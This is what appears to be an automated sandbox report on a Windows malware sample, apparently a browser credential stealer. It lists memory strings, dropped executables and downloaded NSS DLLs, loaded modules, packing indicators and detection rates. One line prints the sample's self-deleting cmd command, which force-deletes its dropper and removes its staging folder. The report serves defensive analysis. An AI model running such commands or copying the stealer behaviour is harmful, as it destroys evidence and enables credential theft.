                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: 21AE.exe, 00000005.00000003.2359456032.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371853553.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2358592973.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371430067.0000000002C96000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814035133.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2830660684.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, HIDAFH.13.dr, BFHJJJ.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeReversingLabs: Detection: 55%
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeVirustotal: Detection: 59%
                  Source: unknownProcess created: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exe
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exe
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mozglue.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
                  Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
                  Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack
                  Source: sqls[1].dll.13.drStatic PE information: real checksum: 0x0 should be: 0x263795
                  Source: C9A7.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x20fc0c
                  Source: aarhevh.2.drStatic PE information: real checksum: 0x16f83 should be: 0x14dc5
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: real checksum: 0x16f83 should be: 0x14dc5
                  Source: katA304.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0xdfa9e
                  Source: sqls[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.13.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.13.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.13.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.13.drStatic PE information: section name: .didat
                  Source: nss3.dll.13.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.13.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0216030D push ecx; ret 5_2_02160315
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DB010 push edx; ret 12_2_042DB21F
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DA910 push edx; ret 12_2_042DA91B
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: section name: .text entropy: 7.0432856719930195
                  Source: aarhevh.2.drStatic PE information: section name: .text entropy: 7.0432856719930195
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\aarhevh
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\nss3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\21AE.exe
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exe | File created: C:\Users\user\AppData\Local\Temp\katA304.tmp
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\C9A7.exe
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                  Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\aarhevh:Zone.Identifier read attributes | delete
                  Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
